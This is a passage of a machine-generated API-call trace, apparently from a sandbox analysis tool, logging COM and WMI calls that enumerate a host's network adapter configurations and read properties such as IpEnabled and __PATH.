pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.589] WbemDefPath:IUnknown:Release (This=0x521d4b0) returned 0x2 [0197.589] WbemDefPath:IUnknown:Release (This=0x521d4b0) returned 0x1 [0197.589] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.590] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d4b0, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521d4b0) returned 0x0 [0197.590] WbemDefPath:IUnknown:AddRef (This=0x521d4b0) returned 0x3 [0197.590] WbemDefPath:IUnknown:Release (This=0x521d4b0) returned 0x2 [0197.590] WbemDefPath:IWbemPath:SetText (This=0x521d4b0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.590] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.590] IWbemClassObject:Get (in: This=0x5227a00, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2577e08*=0, plFlavor=0x2577e0c*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2577e08*=11, plFlavor=0x2577e0c*=0) returned 0x0 [0197.590] IWbemClassObject:Get (in: This=0x5227a00, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2577e08*=11, plFlavor=0x2577e0c*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2577e08*=11, plFlavor=0x2577e0c*=0) returned 0x0 [0197.590] CoTaskMemAlloc (cb=0x4) returned 0x717840 [0197.590] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717840, puReturned=0x2576450 | out: apObjects=0x717840*=0x521d5b0, puReturned=0x2576450*=0x1) returned 0x0 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x521d5b0) returned 0x0 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.592] IUnknown:AddRef (This=0x521d5b0) returned 0x3 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x521d5b4) returned 0x0 [0197.592] IMarshal:GetUnmarshalClass (in: This=0x521d5b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.592] IUnknown:Release (This=0x521d5b4) returned 0x3 [0197.592] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.592] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.592] IUnknown:Release (This=0x521d5b0) returned 0x2 [0197.592] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.592] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.592] IUnknown:QueryInterface (in: This=0x521d5b0, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x521d5b0) returned 0x0 [0197.593] IUnknown:AddRef (This=0x521d5b0) returned 0x4 [0197.593] IUnknown:Release (This=0x521d5b0) returned 0x3 [0197.593] IUnknown:Release (This=0x521d5b0) returned 0x2 [0197.593] CoTaskMemFree (pv=0x717840) [0197.593] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.593] IUnknown:AddRef (This=0x521d5b0) returned 0x3 [0197.593] IWbemClassObject:Get (in: This=0x521d5b0, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.593] IWbemClassObject:Get (in: This=0x521d5b0, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.593] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x80 [0197.593] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x80 [0197.593] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.593] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.593] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.593] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.594] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5228fd8) returned 0x0 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x5228fd8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.594] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5228fd8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521d8e8) returned 0x0 [0197.594] WbemDefPath:IUnknown:Release (This=0x5228fd8) returned 0x0 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521d8e8) returned 0x0 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.594] WbemDefPath:IUnknown:AddRef (This=0x521d8e8) returned 0x3 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717840) returned 0x0 [0197.594] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717840, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.594] WbemDefPath:IUnknown:Release (This=0x717840) returned 0x3 [0197.594] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.595] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.595] WbemDefPath:IUnknown:Release (This=0x521d8e8) returned 0x2 [0197.595] WbemDefPath:IUnknown:Release (This=0x521d8e8) returned 0x1 [0197.595] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.595] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.595] WbemDefPath:IUnknown:QueryInterface (in: This=0x521d8e8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521d8e8) returned 0x0 [0197.595] WbemDefPath:IUnknown:AddRef (This=0x521d8e8) returned 0x3 [0197.595] WbemDefPath:IUnknown:Release (This=0x521d8e8) returned 0x2 [0197.595] WbemDefPath:IWbemPath:SetText (This=0x521d8e8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.595] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.595] IWbemClassObject:Get (in: This=0x521d5b0, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578640*=0, plFlavor=0x2578644*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578640*=11, plFlavor=0x2578644*=0) returned 0x0 [0197.595] IWbemClassObject:Get (in: This=0x521d5b0, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578640*=11, plFlavor=0x2578644*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2578640*=11, plFlavor=0x2578644*=0) returned 0x0 [0197.595] CoTaskMemAlloc (cb=0x4) returned 0x717630 [0197.595] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717630, puReturned=0x2576450 | out: apObjects=0x717630*=0x521d9e8, puReturned=0x2576450*=0x1) returned 0x0 [0197.596] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x521d9e8) returned 0x0 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.597] IUnknown:AddRef (This=0x521d9e8) returned 0x3 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x521d9ec) returned 0x0 [0197.597] IMarshal:GetUnmarshalClass (in: This=0x521d9ec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.597] IUnknown:Release (This=0x521d9ec) returned 0x3 [0197.597] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.597] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.597] IUnknown:Release (This=0x521d9e8) returned 0x2 [0197.597] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.597] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.597] IUnknown:QueryInterface (in: This=0x521d9e8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x521d9e8) returned 0x0 [0197.597] IUnknown:AddRef (This=0x521d9e8) returned 0x4 [0197.597] IUnknown:Release (This=0x521d9e8) returned 0x3 [0197.597] IUnknown:Release (This=0x521d9e8) returned 0x2 [0197.597] CoTaskMemFree (pv=0x717630) [0197.597] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.597] IUnknown:AddRef (This=0x521d9e8) returned 0x3 [0197.597] IWbemClassObject:Get (in: This=0x521d9e8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.598] IWbemClassObject:Get (in: This=0x521d9e8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.598] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x80 [0197.598] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=4") returned 0x80 [0197.598] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.598] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.598] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.598] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.599] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5227d60) returned 0x0 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227d60, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.599] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5227d60, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521ed80) returned 0x0 [0197.599] WbemDefPath:IUnknown:Release (This=0x5227d60) returned 0x0 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521ed80) returned 0x0 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.599] WbemDefPath:IUnknown:AddRef (This=0x521ed80) returned 0x3 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.599] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ed80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717630) returned 0x0 [0197.599] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717630, riid=0x74a1e814*(Data1=0x0, 